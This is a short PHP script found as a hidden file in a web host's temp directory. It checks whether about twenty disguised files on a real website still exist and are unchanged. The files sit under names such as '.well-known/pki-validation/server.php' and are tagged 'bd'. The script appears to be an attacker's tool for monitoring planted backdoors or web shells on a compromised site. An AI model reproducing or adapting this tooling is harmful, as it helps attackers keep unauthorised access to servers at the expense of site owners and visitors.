File: /home/niyknzcu/.cagefs/tmp/.flg
<?php $r = '/home/niyknzcu/crivient.com'; $x = ["/turista_pdf.php"=>"bd@@924675@@953",
"/assets/tahomab.php"=>"bd@@925708@@903",
"/.well-known/pki-validation/chmod023.php"=>"bd@@989982@@1705",
"/.well-known/modifier.dec.php"=>"bd@@989481@@2600",
"/turista.php"=>"bd@@925756@@986",
"/.well-known/pki-validation/addtemplateassoc.php"=>"bd@@945981@@3529",
"/assets/xoops.module.php"=>"bd@@1009479@@1853",
"/assets/Printing.module.php"=>"bd@@923726@@999",
"/.well-known/consumer.php"=>"bd@@955985@@2676",
"/assets/xoops.version.php"=>"bd@@1029478@@2472",
"/.well-known/seosiloing.php"=>"bd@@924299@@1014",
"/.well-known/modifier.php"=>"bd@@974477@@1749",
"/termsofuse.php"=>"bd@@924302@@850",
"/cache_secqaa.php"=>"bd@@922789@@914",
"/beginedit3.php"=>"bd@@938980@@3485",
"/assets/xoops_version.php"=>"bd@@1034986@@3373",
"/.well-known/pki-validation/server.php"=>"bd@@924656@@989",
"/.well-known/pki-validation/register_result.php"=>"bd@@925680@@1036",
"/.well-known/pki-validation/Not.php"=>"bd@@1044983@@2548",
"/.well-known/freesansb.php"=>"bd@@924664@@890"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');